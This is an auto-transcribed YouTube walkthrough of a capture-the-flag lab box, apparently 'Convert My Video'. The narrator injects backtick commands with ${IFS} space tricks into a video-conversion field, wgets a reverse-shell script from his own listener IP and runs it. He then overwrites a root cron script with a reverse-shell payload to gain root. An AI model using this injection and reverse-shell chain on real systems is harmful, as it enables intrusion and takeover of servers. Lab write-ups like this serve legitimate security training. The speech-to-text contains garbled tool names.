Hey, what's going on YouTube? So today we're gonna talk about convert my video. Uh, this is quite, I would not say difficult. It's not an easy mission also. There is a little trick to that mission. Let's see how we can crack that mission. Yeah, let's just jump right into it. So I have the results of the nmap, and I'll get that out. So we have two ports running, and let's see what's running on port 80 and convert my video. So let's see what results are we getting if we send any request, and what does it do? It's taking a lot of time. Okay, let's go to burp and see there is a response. So so okay, so what I'm saying here, it is trying to convert the video ID that we are giving into the YouTube URL, and it is trying to convert something. Yes, so there is some kind of information that is here. I'm not sure if it is useful. Okay, let's try that out. Let's see if we can get something out of that. Let's see if we are getting this response. Okay, so this isn't accessible. Maybe there is no file over there. What if we access downloads temp? No, no, looks like there is a folder called temp, but it's not accessible. Okay, that's okay. What else can we do? So we'll send it to repeater and see. What if we send a command injection? Let's try ls. Okay, so yeah, so I think there is a open source GitHub tool called YouTube DL. I've used this before. Uh, they are using this to download the video and trying to convert. Okay, so can we do some command injection with this thing? We need to look at the GitHub page. Okay, so YouTube DL. Okay, no, I don't think we have. Hmm, I didn't get any useful information here. Okay, let's try something else. What if we ping 127.0.0.1? Okay, it returns the same thing. Okay, So what we can try here is the backcourt. A backcourt is nothing but if you remember my previous videos, that is, you are instructing the terminal that you should execute the commands that are in the backcourt first and then the rest. So now let us try ls. So what do we get from ls? So what we have got is an admin. You can see admin. Does this admin tell something? Not exactly. We don't know what's present in this folder. Let us try lsla, and we've got nothing here. Error in backcourt. So after a lot of research, to get this space into this command, you need to execute something like this, the dollar and open curly braces and ifs and la. So this will actually execute the command. You can try anything in between, like %20 for URL encoded. Now what we have got here, no, we didn't get any clear output, so let's try something else. So let's try ping, ping 127.0.0.1, and okay, so it is taking a lot of time to execute. We don't know what is it actually executing. It may run behind, it may not run behind, but let us, for the video purpose, let us assume that it is running, and let's try to execute our reversal command. So we'll get that from pentest monkey reversal. Okay, so I understand the risks. Copy this and substitute the IP address of mine, nano. We'll go to transfer folder, nano shell, and we don't want this right now, so let's execute that. IP address is 10.9.146.142 and port is 4444. Okay, and yes, let's transfer that folder. Let's create a server here, HTTP server port 80, and we'll have to get wget and the HTTP, my IP address HTTP 10.9.146.142 and shell. Okay, yes, so now that we've got the 200 response, we are now sure that we are the shell is getting downloaded there. Now we have to change the shell permissions, so we'll have to use chmod ifs and 777 and and again ifs and then shell. Yes. So now we should now try and execute this reverse shell here. Yes. So let us be a sudo user and we'll start a listener in our local machine, port 444, and we'll have to execute this command sh and ifs and shell. Okay, so we are not able to execute. Okay, so instead of sh we'll try bash here. Let's see if we get a response, and if this executes right, so yes, we've got the shell, and we'll try and execute the id. So ls, there is something called clean.sh. We'll see what is in clean.sh. Yes. Okay, so it is telling, it is instructing to remove the downloads folder. Okay, so what is the id is www data, and so what we can do is, pull in the linpiece.sh, that is Linux privilege escalation script. We already have the server running in our port, so we have downloaded the linpiece.sh. We'll change the permissions to linpiece.sh. Yes. So it spits the lot of information. So what are we interested? So what do we get here? And there are no cron jobs. Yes. So now that we have got the shell here, so we'll try and find out how to escalate from here. And you can try a lot of things, sudo l, and there is no sudo here. And if you can search for the processes that are running, what you can actually find here, so these are the the shell, the command that we gave, that's actually got executed. And you can see a lot of process running. So what you have to note is the cron job that is running here. When you cat out hc cron tab, you will not find anything. Yes, this is the normal that you can see. Okay, so we have this process that is running, and to closely monitor the process, we have the tool that is called PSPI. Uh, so this tool will give you elaborately what is that processor and what is it, what are the files that are accessing. Now that we have got a hint that there is a cron job that is running, And if we use this tool, we'll we'll get to know what are the files that is trying to execute, and we'll be able to see where we can execute our commands. So okay, so this is saying it allows you to see commands run by other users such as cron jobs. Yeah, that's what we need. And yes, so I already have the 64-bit version of this, and I've transferred it to my transfer folder. So I'll just pull in that. So cd to temp, and okay, so wget http 10.9.146.32 and pspy64. This is actually a big file which is 2 2 MB. Yes, so we'll chmod pspy64. Let's try and execute pspy64. Okay, so let me open this bigger. So we know that we have been trying to execute these commands. That's why we've got the shell, and it has started this on our reverse shell command. And yes, so there is something called clean.sh which is present in this temp folder var www.html temp, and it is trying to execute the bash. Okay, that is running as a cron. So as of now we were able to get this, and this is executing, you know, at within quite a few intervals. And yes, let's try to let's try to see the Linux permissions for that clean.sh. We'll again have to get the shell back. So we'll go to burp, start the listener, and just send the request. Yes, we've got. And we now have to see the Linux permissions for that. lsal and clean.sh. Okay, so what we can do is I have a transfer folder here. Okay, so I'll just get that out. I got this clean.sh from the reverse shell payload all things. So I've edited to my IP address, and the port is 555. So I'll get this here, and wget http 10.9.146.142 clean.sh. Yes, so we should chmod x clean.sh clean.sh. No. So we need not run the clean.sh. It will run. So what we have to do is to set up a netcat here. I'll go as a root user, and I'll start a listener. Okay. Yes. So we've got the shellback. So the ID is root. We have successfully rooted this machine. Let's get the flags. Root.txt, root console, root analysis, root.txt, and yes, and we also need the user flag, flag.txt. Okay, yes, congratulations, we have successfully rooted this machine. And if you like my videos, please do like. If you, I'm posting a video a day, uh, uh, because I'm preparing for OSCP. Yes, please do subscribe and share. Thank you.